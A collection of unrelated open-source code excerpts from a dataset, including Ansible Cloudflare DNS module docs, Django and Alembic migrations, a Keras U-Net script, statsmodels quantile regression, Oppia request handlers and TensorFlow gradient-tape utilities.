- The TTL to give the new record. Must be between 120 and 2,147,483,647 seconds, or 1 for automatic.
default: 1 (automatic)
type:
description:
- The type of DNS record to create. Required if C(state=present)
- C(type=DS), C(type=SSHFP) and C(type=TLSA) added in Ansible 2.7.
choices: [ 'A', 'AAAA', 'CNAME', 'TXT', 'SRV', 'MX', 'NS', 'DS', 'SPF', 'SSHFP', 'TLSA' ]
value:
description:
- The record value. Required for C(state=present)
aliases: [ "content" ]
weight:
descrip | tion: Service weight. Required for C(type=SRV)
default: "1"
zone:
description:
- The name of the Zone to work with (e.g. "example.com"). The Zone must already exist.
required: true
aliases: ["domain"]
'''
EXAMPLES = '''
# create a test.my.com A record to point to 127.0.0.1
- cloudflare_dns:
zone: my.com
record: test
type: A
value: 127.0.0.1
account_email: test@example.com
account_api_token: dummyapitoken
register: record
# cr | eate a my.com CNAME record to example.com
- cloudflare_dns:
zone: my.com
type: CNAME
value: example.com
state: present
account_email: test@example.com
account_api_token: dummyapitoken
# change it's ttl
- cloudflare_dns:
zone: my.com
type: CNAME
value: example.com
ttl: 600
state: present
account_email: test@example.com
account_api_token: dummyapitoken
# and delete the record
- cloudflare_dns:
zone: my.com
type: CNAME
value: example.com
state: absent
account_email: test@example.com
account_api_token: dummyapitoken
# create a my.com CNAME record to example.com and proxy through cloudflare's network
- cloudflare_dns:
zone: my.com
type: CNAME
value: example.com
state: present
proxied: yes
account_email: test@example.com
account_api_token: dummyapitoken
# create TXT record "test.my.com" with value "unique value"
# delete all other TXT records named "test.my.com"
- cloudflare_dns:
domain: my.com
record: test
type: TXT
value: unique value
state: present
solo: true
account_email: test@example.com
account_api_token: dummyapitoken
# create a SRV record _foo._tcp.my.com
- cloudflare_dns:
domain: my.com
service: foo
proto: tcp
port: 3500
priority: 10
weight: 20
type: SRV
value: fooserver.my.com
# create a SSHFP record login.example.com
- cloudflare_dns:
zone: example.com
record: login
type: SSHFP
algorithm: 4
hash_type: 2
value: 9dc1d6742696d2f51ca1f1a78b3d16a840f7d111eb9454239e70db31363f33e1
# create a TLSA record _25._tcp.mail.example.com
- cloudflare_dns:
zone: example.com
record: mail
port: 25
proto: tcp
type: TLSA
cert_usage: 3
selector: 1
hash_type: 1
value: 6b76d034492b493e15a7376fccd08e63befdad0edab8e442562f532338364bf3
# Create a DS record for subdomain.example.com
- cloudflare_dns:
zone: example.com
record: subdomain
type: DS
key_tag: 5464
algorithm: 8
hash_type: 2
value: B4EB5AC4467D2DFB3BAF9FB9961DC1B6FED54A58CDFAA3E465081EC86F89BFAB
'''
RETURN = '''
record:
description: dictionary containing the record data
returned: success, except on record deletion
type: complex
contains:
content:
description: the record content (details depend on record type)
returned: success
type: string
sample: 192.0.2.91
created_on:
description: the record creation date
returned: success
type: string
sample: 2016-03-25T19:09:42.516553Z
data:
description: additional record data
returned: success, if type is SRV, DS, SSHFP or TLSA
type: dictionary
sample: {
name: "jabber",
port: 8080,
priority: 10,
proto: "_tcp",
service: "_xmpp",
target: "jabberhost.sample.com",
weight: 5,
}
id:
description: the record id
returned: success
type: string
sample: f9efb0549e96abcb750de63b38c9576e
locked:
description: No documentation available
returned: success
type: boolean
sample: False
meta:
description: No documentation available
returned: success
type: dictionary
sample: { auto_added: false }
modified_on:
description: record modification date
returned: success
type: string
sample: 2016-03-25T19:09:42.516553Z
name:
description: the record name as FQDN (including _service and _proto for SRV)
returned: success
type: string
sample: www.sample.com
priority:
description: priority of the MX record
returned: success, if type is MX
type: int
sample: 10
proxiable:
description: wh |
theworldbright/mainsite | aspc/blog/migrations/0001_initial.py | Python | mit | 736 | 0.001359 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=80)),
('body', models.TextField()),
('posted', models.DateTimeField()),
('slug', models.SlugField()),
],
| options={
'orderin | g': ['posted'],
},
bases=(models.Model,),
),
]
|
PythonProgramming/Python-3-basics-series | 28. multi line print.py | Python | mit | 549 | 0.007286 | '''
So now I just briefly want to cover multi line p | rint outs.
I remember making beautiful print outs as sort of guis, but I would do
print and then print out the line, then another print... and so on,
but you can actually do multi line prints with just 1 print. So let's see:
'''
print(
'''
This
is
a
test
'''
)
print(
'''
So it works like a multi-line
comment, but it will print out.
You can make kewl designs like this:
==============
| |
| | |
| BOX |
| |
| |
==============
'''
)
|
ultra-lstm/RNA-GAN | Refinement/predict.py | Python | mit | 7,897 | 0.008358 | import numpy as np
import pandas as pd
import tensorflow as tf
import scipy.misc
from keras.utils import plot_model
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Model, Sequential
from keras.layers import Input, Dropout, Activation, LSTM, Conv2D, Conv2DTranspose, Dense, TimeDistributed, Flatten, Reshape, Cropping2D, GaussianNoise, Concatenate, BatchNormalization, SeparableConv2D, MaxPooling2D, UpSampling2D, ZeroPadding2D
from keras.losses import mean_squared_error
from keras.optimizers import Adadelta, RMSprop
from keras import backend as K
from keras.layers.advanced_activations import LeakyReLU
from keras.models import load_model
#K.set_learning_phase(1) #set learning phase
sequences_per_batch = 1
epochs = 100
image_size = 240
sequence_length = 155
sequence_start = 0
train_seq = 1
train_cnt = int(sequence_length / train_seq)
file_list = 'val.txt'
input_mode = 'test'
input_data = 4
input_attention = 3
input_dimension = input_data + input_attention
output_dimension = 3
base = 42
folder = 'data'
# load data list
files = np.genfromtxt(file_list, dtype='str')
# define model
def conv_block(m, dim, acti, bn, res, do=0.2):
n = TimeDistributed(Conv2D(dim, 6, padding='same'))(m)
n = TimeDistributed(LeakyReLU())(n)
n = BatchNormalization()(n) if bn else n
n = TimeDistributed(Dropout(do))(n) if do else n
n = TimeDistributed(Conv2D(dim, 6, padding='same'))(n)
n = TimeDistributed(LeakyReLU())(n)
n = BatchNormalization()(n) if bn else n
return Concatenate()([m, n]) if res else n
def level_block(m, dim, depth, inc, acti, do, bn, mp, up, res):
if depth > 0:
n = conv_block(m, dim, acti, bn, res)
m = TimeDistributed(MaxPooling2D())(n) if mp else TimeDistributed(Conv2D(dim, 4, strides=2, padding='same'))(n)
print(n.shape)
print(m.shape)
m = level_block(m, int(inc*dim), depth-1, inc, acti, do, bn, mp, up, res)
if up:
m = TimeDistributed(UpSampling2D())(m)
m = TimeDistributed(Conv2D(dim, 4, padding='same'))(m)
m = TimeDistributed(LeakyReLU())(m)
else:
m = TimeDistributed(Conv2DTranspose(dim, 4, strides=2, padding='same'))(m)
m = TimeDistributed(LeakyReLU())(m)
n = Concatenate()([n, m])
m = conv_block(n, dim, acti, bn, res)
else:
m = conv_block(m, dim, acti, bn, res, do)
l = TimeDistributed(Flatten())(m)
#l = LSTM(4 * 4 * 128, stateful=True, return_sequences=True)(l)
l = LSTM(2048, stateful=True, return_sequences=True)(l)
l = TimeDistributed(Reshape((2, 2, 2048/4)))(l)
m = l
#m = Concatenate()([l, m])
m = conv_block(m, dim, acti, bn, res, do)
return m
def UNet(input_shape, out_ch=1, start_ch=64, depth=7, inc_rate=1.5, activation='relu',
dropout=0.4, batchnorm=True, maxpool=True, upconv=True, residual=False):
i = Input(batch_shape=input_shape)
o = TimeDistributed(ZeroPadding2D(padding=8))(i)
o = TimeDistributed(SeparableConv2D(start_ch, 7, padding='same'))(o)
o = level_block(o, start_ch, depth, inc_rate, activation, dropout, batchnorm, maxpool, upconv, residual)
o = TimeDistributed(Cropping2D(cropping=8))(o)
o = TimeDistributed(Conv2D(out_ch, 1, activation='tanh'))(o)
return Model(inputs=i, outputs=o)
model = UNet((sequences_per_batch, train_seq, image_size, image_size, input_dimension), out_ch=6, start_ch=base)
model.load_weights('v2.h5')
model.compile(loss='mean_squared_error', optimizer=RMSprop())
for k in model.layers:
print(k.output_shape)
plot_model(model, to_file='model.png')
def load_sequence(p, is_train=False):
pattern = p.decode("utf-8")
val = []
for s in xrange(sequence_length):
name = pattern.format('test', sequence_start + s, folder)
try:
input_img = scipy.misc.imread(name, mode='L').astype(np.float)
except:
val.append(np.zeros((1, image_size, image_size, input_dimension + output_dimension)))
continue
images = np.split(input_img, input_dimension + output_dimension, axis=1)
half_offset = 4
offset = half_offset * 2
hypersize = image_size + offset
fullsize = 256 + offset
h1 = int(np.ceil(np.random.uniform(1e-2, offset)))
w1 = int(np.ceil(np.random.uniform(1e-2, offset)))
conv = []
for image in images:
top = int((fullsize - image.shape[1]) / 2)
bottom = fullsize - image.shape[1] - top
image = np.append(np.zeros((image.shape[0], top)), image, axis=1)
image = np.append(image, np.zeros((image.shape[0], bottom)), axis=1)
left = int((fullsize - image.shape[0]) / 2)
right = fullsize - image.shape[0] - left
image = np.append(np.zeros((left, image.shape[1])), image, axis=0)
image = np.append(image, np.zeros((right, image.shape[1])), axis=0)
tmp = scipy.misc.imresize(image, [hypersize, hypersize], interp='nearest')
if is_train:
image = tmp[h1:h1+image_size, w1:w1+image_size]
else:
image = tmp[half_offset:half_offset+image_size, half_offset:half_offset+image_size]
image = image/127.5
conv.append(image)
#print(np.stack(conv, axis=2).shape)
val.append([np.stack(conv, axis=2)])
st = np.stack(val, axis=1)
#z = np.zeros((1, sequence_length - st.shape[1], image_size, image_size, input_dimension + output_dimension))
#o = np.append(z, st, axis=1)
o = st
o = o - 1
return o
def makeMask(gt, ct):
gt = (gt+1) / 2
ct = (ct+1) / 2
t_mask = np.clip(gt - ct, 0, 1)
n_mask = np.clip(ct - gt, 0, 1)
t_mask = (t_mask * 2) - 1
n_mask = (n_mask * 2) - 1
return np.concatenate((t_mask, n_mask), axis=4)
def extractGT(seq):
gt, data = np.split(batch_sequence, [output_dimension], axis=4)
gta, gtb, gtc = np.split(gt, 3, axis=4)
z1, z2, z3, z4, cta, ctb, ctc = np.split(data, input_dimension, axis=4)
m1 | = makeMask(gta, cta)
m2 = makeMask(gtb, ctb)
m3 = makeMask(gtc, ctc)
gt = np.concatenate((m1, m2, m3), axis=4)
return data, gt, np.concatenate((cta, ctb, ctc), | axis=4)
def combine(e, g, p1, q1):
p, m = np.split(e, 2, axis=4)
return np.sign(g + np.sign(p-p1) - np.sign(m-q1))
def merge(yo, error, p, q):
ae, be, ce = np.split(error, 3, axis=4)
ag, bg, cg = np.split(yo, 3, axis=4)
a = combine(ae, ag, p, q)
b = combine(be, bg, p, q)
c = combine(ce, cg, p, q)
return np.concatenate((a, b, c), axis=4)
def wrt(yo, error, name, p, q, c):
out = merge(yo, error, p, q)
all = np.append(batch_sequence, out, axis=4)
all = all.reshape((train_seq, image_size, image_size, 13))
sp = np.split(all, train_seq, axis=0)
sp = [s.reshape((image_size, image_size, 13)) for s in sp]
haa = np.concatenate(sp, axis=0)
jaa = np.concatenate(np.split(haa, 13, axis=2), axis=1)
fa = (jaa+1.)/2.
yo = np.concatenate((fa, fa, fa), axis=2)
scipy.misc.imsave(files[sequence].format('out', c, name), yo)
# test
number_of_sequences = files.size
for sequence in range(number_of_sequences):
print('S: {} '.format(sequence))
seq = load_sequence(files[sequence])
batch_sequences = np.split(seq, train_cnt, axis=1)
model.reset_states()
c = 0
for batch_sequence in batch_sequences:
data, gt, yo = extractGT(batch_sequence)
error = model.predict_on_batch(data)
wrt(yo, error, 'o1', 0.5, 0.5, c)
wrt(yo, error, 'o2', 0.3, 0.8, c)
wrt(yo, error, 'o3', 0.8, 0.3, c)
c = c + 1
|
fedspendingtransparency/data-act-broker-backend | dataactcore/migrations/versions/967fbc28a6ef_merge_ada3c1420257_and_bab396e50b1f.py | Python | cc0-1.0 | 581 | 0.006885 | """merge ad | a3c1420257 and bab396e50b1f
Revision ID: 967fbc28a6ef
Revises: ada3c1420257, bab396e50b1f
Create Date: 2017-08-07 11:48:14.479939
"""
# revision identifiers, used by Alembic.
revision = '967fbc28a6ef'
down_revision = ('ada3c1420257', 'bab396e50b1f')
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
glo | bals()["downgrade_%s" % engine_name]()
def upgrade_data_broker():
pass
def downgrade_data_broker():
pass
|
bert9bert/statsmodels | statsmodels/regression/quantile_regression.py | Python | bsd-3-clause | 15,397 | 0.002663 | #!/usr/bin/env python
'''
Quantile regression model
Model parameters are estimated using iterated reweighted least squares. The
asymptotic covariance matrix estimated using kernel density estimation.
Author: Vincent Arel-Bundock
License: BSD-3
Created: 2013-03-19
The original IRLS function was written for Matlab by Shapour Mohammadi,
University of Tehran, 2008 (shmohammadi@gmail.com), with some lines based on
code written by James P. Lesage in Applied Econometrics Using MATLAB(1999).PP.
73-4. Translated to python with permission from original author by Christian
Prinoth (christian at prinoth dot name).
'''
from statsmodels.compat.python import range
import numpy as np
import warnings
import scipy.stats as stats
from scipy.linalg import pinv
from scipy.stats import norm
from statsmodels.tools.tools import chain_dot
from statsmodels.compat.numpy import np_matrix_rank
from statsmodels.tools.decorators import cache_readonly
from statsmodels.regression.linear_model import (RegressionModel,
RegressionResults,
RegressionResultsWrapper)
from statsmodel | s.tools.sm_exceptions import (ConvergenceWarning,
IterationLimitWarning)
class QuantReg(RegressionModel):
'''Quantile Regression
Estimate a quantile regression model using iterative reweighted least
squares.
Parameters
----------
endog : array or dataframe
endogenous/response variable
exog : array or dataframe
exogenous/explanatory variable(s)
Notes
-----
The Least | Absolute Deviation (LAD) estimator is a special case where
quantile is set to 0.5 (q argument of the fit method).
The asymptotic covariance matrix is estimated following the procedure in
Greene (2008, p.407-408), using either the logistic or gaussian kernels
(kernel argument of the fit method).
References
----------
General:
* Birkes, D. and Y. Dodge(1993). Alternative Methods of Regression, John Wiley and Sons.
* Green,W. H. (2008). Econometric Analysis. Sixth Edition. International Student Edition.
* Koenker, R. (2005). Quantile Regression. New York: Cambridge University Press.
* LeSage, J. P.(1999). Applied Econometrics Using MATLAB,
Kernels (used by the fit method):
* Green (2008) Table 14.2
Bandwidth selection (used by the fit method):
* Bofinger, E. (1975). Estimation of a density function using order statistics. Australian Journal of Statistics 17: 1-17.
* Chamberlain, G. (1994). Quantile regression, censoring, and the structure of wages. In Advances in Econometrics, Vol. 1: Sixth World Congress, ed. C. A. Sims, 171-209. Cambridge: Cambridge University Press.
* Hall, P., and S. Sheather. (1988). On the distribution of the Studentized quantile. Journal of the Royal Statistical Society, Series B 50: 381-391.
Keywords: Least Absolute Deviation(LAD) Regression, Quantile Regression,
Regression, Robust Estimation.
'''
def __init__(self, endog, exog, **kwargs):
super(QuantReg, self).__init__(endog, exog, **kwargs)
def whiten(self, data):
"""
QuantReg model whitener does nothing: returns data.
"""
return data
def fit(self, q=.5, vcov='robust', kernel='epa', bandwidth='hsheather',
max_iter=1000, p_tol=1e-6, **kwargs):
'''Solve by Iterative Weighted Least Squares
Parameters
----------
q : float
Quantile must be between 0 and 1
vcov : string, method used to calculate the variance-covariance matrix
of the parameters. Default is ``robust``:
- robust : heteroskedasticity robust standard errors (as suggested
in Greene 6th edition)
- iid : iid errors (as in Stata 12)
kernel : string, kernel to use in the kernel density estimation for the
asymptotic covariance matrix:
- epa: Epanechnikov
- cos: Cosine
- gau: Gaussian
- par: Parzene
bandwidth: string, Bandwidth selection method in kernel density
estimation for asymptotic covariance estimate (full
references in QuantReg docstring):
- hsheather: Hall-Sheather (1988)
- bofinger: Bofinger (1975)
- chamberlain: Chamberlain (1994)
'''
if q < 0 or q > 1:
raise Exception('p must be between 0 and 1')
kern_names = ['biw', 'cos', 'epa', 'gau', 'par']
if kernel not in kern_names:
raise Exception("kernel must be one of " + ', '.join(kern_names))
else:
kernel = kernels[kernel]
if bandwidth == 'hsheather':
bandwidth = hall_sheather
elif bandwidth == 'bofinger':
bandwidth = bofinger
elif bandwidth == 'chamberlain':
bandwidth = chamberlain
else:
raise Exception("bandwidth must be in 'hsheather', 'bofinger', 'chamberlain'")
endog = self.endog
exog = self.exog
nobs = self.nobs
exog_rank = np_matrix_rank(self.exog)
self.rank = exog_rank
self.df_model = float(self.rank - self.k_constant)
self.df_resid = self.nobs - self.rank
n_iter = 0
xstar = exog
beta = np.ones(exog_rank)
# TODO: better start, initial beta is used only for convergence check
# Note the following doesn't work yet,
# the iteration loop always starts with OLS as initial beta
# if start_params is not None:
# if len(start_params) != rank:
# raise ValueError('start_params has wrong length')
# beta = start_params
# else:
# # start with OLS
# beta = np.dot(np.linalg.pinv(exog), endog)
diff = 10
cycle = False
history = dict(params = [], mse=[])
while n_iter < max_iter and diff > p_tol and not cycle:
n_iter += 1
beta0 = beta
xtx = np.dot(xstar.T, exog)
xty = np.dot(xstar.T, endog)
beta = np.dot(pinv(xtx), xty)
resid = endog - np.dot(exog, beta)
mask = np.abs(resid) < .000001
resid[mask] = ((resid[mask] >= 0) * 2 - 1) * .000001
resid = np.where(resid < 0, q * resid, (1-q) * resid)
resid = np.abs(resid)
xstar = exog / resid[:, np.newaxis]
diff = np.max(np.abs(beta - beta0))
history['params'].append(beta)
history['mse'].append(np.mean(resid*resid))
if (n_iter >= 300) and (n_iter % 100 == 0):
# check for convergence circle, shouldn't happen
for ii in range(2, 10):
if np.all(beta == history['params'][-ii]):
cycle = True
warnings.warn("Convergence cycle detected", ConvergenceWarning)
break
if n_iter == max_iter:
warnings.warn("Maximum number of iterations (" + str(max_iter) +
") reached.", IterationLimitWarning)
e = endog - np.dot(exog, beta)
# Greene (2008, p.407) writes that Stata 6 uses this bandwidth:
# h = 0.9 * np.std(e) / (nobs**0.2)
# Instead, we calculate bandwidth as in Stata 12
iqre = stats.scoreatpercentile(e, 75) - stats.scoreatpercentile(e, 25)
h = bandwidth(nobs, q)
h = min(np.std(endog),
iqre / 1.34) * (norm.ppf(q + h) - norm.ppf(q - h))
fhat0 = 1. / (nobs * h) * np.sum(kernel(e / h))
if vcov == 'robust':
d = np.where(e > 0, (q/fhat0)**2, ((1-q)/fhat0)**2)
xtxi = pinv(np.dot(exog.T, exog))
xtdx = np.dot(exog.T * d[np.newaxis, :], exog)
vcov = chain_dot(xtxi, xtdx, xtxi)
elif vcov == 'iid':
vcov = (1. / fhat0)**2 * q * (1 - q) * pinv(np.dot(exog.T, exog))
else:
raise Exception("vcov must be 'robust' or 'iid'")
lfit = QuantRegResults(self, beta, n |
fridex/fabric8-analytics-worker | tests/workers/test_licensecheck.py | Python | gpl-3.0 | 2,348 | 0.001278 | # -*- coding: utf-8 -*-
import pytest
import os
import jsonschema
from flexmock import flexmock
from f8a_worker.workers import LicenseCheckTask
from f8a_worker.schemas import load_worker_schema, pop_schema_ref
from f8a_worker.object_cache import EPVCache
# TODO: drop the try/except after switching to Python 3
try:
from shutil import which
except ImportError:
# Near-enough-for-our-purposes equivalent in Python 2.x
from distutils.spawn import find_executable as which
@pytest.mark.offline
@pytest.mark.usefixtures("dispatcher_setup")
class TestLicenseCheck(object):
@pytest.mark.usefixtures("no_s3_connection")
def test_error(self):
data = "/this-is-not-a-real- | directory"
args = dict.fromkeys(('ecosystem', 'name', 'version'), 'some-value')
flexm | ock(EPVCache).should_receive('get_sources').and_return(data)
task = LicenseCheckTask.create_test_instance(task_name='source_licenses')
with pytest.raises(Exception):
results = task.execute(arguments=args)
@pytest.mark.skipif(not os.path.isfile('/opt/scancode-toolkit/scancode'),
reason="requires scancode")
@pytest.mark.usefixtures("no_s3_connection")
def test_execute(self):
data = os.path.join(
os.path.dirname(
os.path.abspath(__file__)), '..', 'data', 'license')
args = dict.fromkeys(('ecosystem', 'name', 'version'), 'some-value')
flexmock(EPVCache).should_receive('get_sources').and_return(data)
task = LicenseCheckTask.create_test_instance(task_name='source_licenses')
results = task.execute(arguments=args)
assert results is not None
assert isinstance(results, dict)
assert results['status'] == 'success'
# Check task self-validation
task.validate_result(results)
# Check scan consumer validation
schema_ref = pop_schema_ref(results)
schema = load_worker_schema(schema_ref)
jsonschema.validate(results, schema)
short_name = 'LGPL 2.1 or later'
details = results['details']
assert details.get('files_count') is not None and details.get('files_count') > 0
assert short_name in details.get('licenses', {})
summary = results['summary']
assert short_name in summary.get('sure_licenses', [])
|
anthkris/oppia | core/controllers/base.py | Python | apache-2.0 | 20,845 | 0.000096 | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base constants and handlers."""
import base64
import Cookie
import datetime
import hmac
import json
import logging
import os
import sys
import time
import traceback
import urlparse
import jinja2
import webapp2
from google.appengine.api import users
from core.domain import config_domain
from core.domain import config_services
from core.domain import rights_manager
from core.domain import rte_component_registry
from core.domain import user_services
from core.platform import models
import feconf
import jinja_utils
import utils
current_user_services = models.Registry.import_current_user_services()
(user_models,) = models.Registry.import_models([models.NAMES.user])
ONE_DAY_AGO_IN_SECS = -24 * 60 * 60
DEFAULT_CSRF_SECRET = 'oppia csrf secret'
CSRF_SECRET = config_domain.ConfigProperty(
'oppia_csrf_secret', {'type': 'unicode'},
'Text used to encrypt CSRF tokens.', DEFAULT_CSRF_SECRET)
BEFORE_END_HEAD_TAG_HOOK = config_domain.ConfigProperty(
'before_end_head_tag_hook', {
'type': 'unicode',
'ui_config': {
'rows': 7,
},
},
'Code to insert just before the closing </head> tag in all pages.', '')
def require_user(handler):
"""Decorator that checks if a user is associated to the current session."""
def test_login(self, **kwargs):
"""Checks if the user for the current session is logged in."""
if not self.user_id:
self.redirect(current_user_services.create_login_url(
self.request.uri))
return
return handler(self, **kwargs)
return test_login
def require_moderator(handler):
"""Decorator that checks if the current user is a moderator."""
def test_is_moderator(self, **kwargs):
"""Check that the user is a moderator."""
if not self.user_id:
self.redirect(current_user_services.create_login_url(
self.request.uri))
return
if not rights_manager.Actor(self.user_id).is_moderator():
raise self.UnauthorizedUserException(
'You do not have the credentials to access this page.')
return handler(self, **kwargs)
return test_is_moderator
def require_fully_signed_up(handler):
"""Decorator that checks if the user is logged in and has completed the
signup process. If any of these checks fail, an UnauthorizedUserException
is | raised.
"""
def test_registered_as_editor(self, **kwargs):
"""Check that the user has registered as an editor."""
if (not self.user_id
or self.username in config_domain.BANNED_USERNAMES.value
or not user_services.has_fully_registered(self.user_id)):
raise self.UnauthorizedUserException(
'You do not have the credentials to access this page.' | )
return handler(self, **kwargs)
return test_registered_as_editor
def _clear_login_cookies(response_headers):
# AppEngine sets the ACSID cookie for http:// and the SACSID cookie
# for https:// . We just unset both below.
cookie = Cookie.SimpleCookie()
for cookie_name in ['ACSID', 'SACSID']:
cookie = Cookie.SimpleCookie()
cookie[cookie_name] = ''
cookie[cookie_name]['expires'] = (
datetime.datetime.utcnow() +
datetime.timedelta(seconds=ONE_DAY_AGO_IN_SECS)
).strftime('%a, %d %b %Y %H:%M:%S GMT')
response_headers.add_header(*cookie.output().split(': ', 1))
class LogoutPage(webapp2.RequestHandler):
def get(self):
"""Logs the user out, and returns them to a specified page or the home
page.
"""
# The str conversion is needed, otherwise an InvalidResponseError
# asking for the 'Location' header value to be str instead of
# 'unicode' will result.
url_to_redirect_to = str(self.request.get('return_url') or '/')
_clear_login_cookies(self.response.headers)
if feconf.DEV_MODE:
self.redirect(users.create_logout_url(url_to_redirect_to))
else:
self.redirect(url_to_redirect_to)
class BaseHandler(webapp2.RequestHandler):
"""Base class for all Oppia handlers."""
# Whether to check POST and PUT payloads for CSRF tokens prior to
# processing them. Can be overridden by subclasses if this check is
# not necessary.
REQUIRE_PAYLOAD_CSRF_CHECK = True
# Whether to redirect requests corresponding to a logged-in user who has
# not completed signup in to the signup page. This ensures that logged-in
# users have agreed to the latest terms.
REDIRECT_UNFINISHED_SIGNUPS = True
# What format the get method returns when exception raised, json or html
GET_HANDLER_ERROR_RETURN_TYPE = feconf.HANDLER_TYPE_HTML
@webapp2.cached_property
def jinja2_env(self):
return jinja_utils.get_jinja_env(feconf.FRONTEND_TEMPLATES_DIR)
def __init__(self, request, response): # pylint: disable=super-init-not-called
# Set self.request, self.response and self.app.
self.initialize(request, response)
self.start_time = datetime.datetime.utcnow()
# Initializes the return dict for the handlers.
self.values = {}
self.user = current_user_services.get_current_user()
self.user_id = current_user_services.get_user_id(
self.user) if self.user else None
self.username = None
self.has_seen_editor_tutorial = False
self.partially_logged_in = False
self.values['profile_picture_data_url'] = None
self.preferred_site_language_code = None
if self.user_id:
email = current_user_services.get_user_email(self.user)
user_settings = user_services.get_or_create_user(
self.user_id, email)
self.values['user_email'] = user_settings.email
if (self.REDIRECT_UNFINISHED_SIGNUPS and not
user_services.has_fully_registered(self.user_id)):
_clear_login_cookies(self.response.headers)
self.partially_logged_in = True
self.user_id = None
else:
self.username = user_settings.username
self.preferred_site_language_code = (
user_settings.preferred_site_language_code)
self.values['username'] = self.username
self.values['profile_picture_data_url'] = (
user_settings.profile_picture_data_url)
if user_settings.last_started_state_editor_tutorial:
self.has_seen_editor_tutorial = True
# In order to avoid too many datastore writes, we do not bother
# recording a log-in if the current time is sufficiently close
# to the last log-in time.
if (user_settings.last_logged_in is None or
not utils.are_datetimes_close(
datetime.datetime.utcnow(),
user_settings.last_logged_in)):
user_services.record_user_logged_in(self.user_id)
rights_mgr_user = rights_manager.Actor(self.user_id)
self.is_moderator = rights_mgr_user.is_moderator()
self.is_admin = rights_mgr_user.is_admin()
self.is_super_admin = (
current_user_services.is_current_user_super_admin())
self.values['is_moderator'] = self.is_moderator
self.values['is_admin'] = self.is_admin
self.values['is_super_admin'] = self.is_super_admin
|
vdmann/cse-360-image-hosting-website | django-varnish-master/varnishapp/urls.py | Python | mit | 180 | 0.005556 | from django. | conf.urls.defaults import *
from django.conf import settings
from manager import VarnishManager
urlpatterns = patterns('varnishapp.views',
(r'', 'management'),
| )
|
fontanon/deldichoalhecho | test.py | Python | gpl-3.0 | 221 | 0 | #!/usr/bin/env python
from django.core.management import call_command
impor | t os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project_site.settings")
call_command('test', 'promises_instances', 'ddah | _web', verbosity=1)
|
gunan/tensorflow | tensorflow/python/eager/tape.py | Python | apache-2.0 | 7,733 | 0.007242 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradient tape utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
from tensorflow.python import pywrap_tfe
from tensorflow.python.util.lazy_loader import LazyLoader
# There is a circular dependency between this, ops.py, and
# distribution_strategy_context.
# TODO(b/117329403): Remove this circular dependency.
distribution_strategy_context = LazyLoader(
"distribution_strategy_context", globals(),
"tensorflow.python.distribute."
"distribution_strategy_context")
class Tape(object):
"""Represents a gradient propagation trace."""
def __init__(self, tape):
self._tape = tape
def watched_variables(self):
return pywrap_tfe.TFE_Py_TapeWatchedVariables(self._tape)
def push_new_tape(persistent=False, watch_accessed_variables=True):
"""Pushes a new tape onto the tape stack."""
tape = pywrap_tfe.TFE_Py_TapeSetNew(persistent, watch_accessed_variables)
return Tape(tape)
def push_tape(tape):
"""Pushes an existing tape onto the tape stack."""
pywrap_tfe.TFE_Py_TapeSetAdd(tape._tape) # pylint: disable=protected-access
def watch(tape, tensor):
"""Marks this tensor to be watched by the given tape."""
pywrap_tfe.TFE_Py_TapeWatch(tape._tape, tensor) # pylint: disable=protected-access
class VariableWatcher(object):
"""A scope that tracks all trainable variable accesses within it.
This explicitly ignores variables that are not marked as trainable.
Sample usage:
var = tf.Variable(0.0)
with VariableWatcher() as variable_watcher:
var.assign_add(1.0)
assert variable_watcher.watched_variables == [var]
"""
def __init__(self):
self._variable_watcher = None
def __enter__(self):
self._variable_watcher = pywrap_tfe.TFE_Py_VariableWatcherNew()
return self
def __exit__(self, typ, value, traceback):
pywrap_tfe.TFE_Py_VariableWatcherRemove(self._variable_watcher)
def watched_variables(self):
"""Returns a tuple of variables accessed under this scope."""
return pywrap_tfe.TFE_Py_VariableWatcherWatchedVariables(
self._variable_watcher)
def watch_variable(tape, variable):
"""Marks this variable to be watched by the given tape."""
strategy, context = (
distribution_strategy_context.get_strategy_and_replica_context())
if context:
variables = [strategy.extended.value_container(variable)]
else:
variables = strategy.experimental_local_results(variable)
for var in variables:
pywrap_tfe.TFE_Py_TapeWatchVariable(tape._tape, var) # pylint: disable=protected-access
pywrap_tfe.TFE_Py_VariableWatcherVariableAccessed(var)
def variable_accessed(variable):
"""Notifies all tapes in the stack that a variable has been accessed.
Args:
variable: variable to be watched.
"""
strategy, context = (
distribution_strategy_context.get_strategy_and_replica_context())
if context:
variables = [strategy.extended.value_container(variable)]
else:
variables = strategy.experimental_local_results(variable)
for var in variables:
pywrap_tfe.TFE_Py_TapeVariableAccessed(var)
pywrap_tfe.TFE_Py_VariableWatcherVariableAccessed(var)
def variables_accessed(variables):
"""Notifies all tapes in the stack that variables have been accessed.
Only trainable variables are marked as accessed.
Args:
variables: iterable of variables to mark as accessed.
"""
strategy, context = (
distribution_strategy_context.get_strategy_and_replica_context())
accessed = []
if context:
accessed = [strategy.extended.value_container(variable)
for variable in variables if variable.trainable]
else:
for variable in variables:
if variable.trainable:
accessed.extend(strategy.experimental_local_results(variable))
for var in accessed:
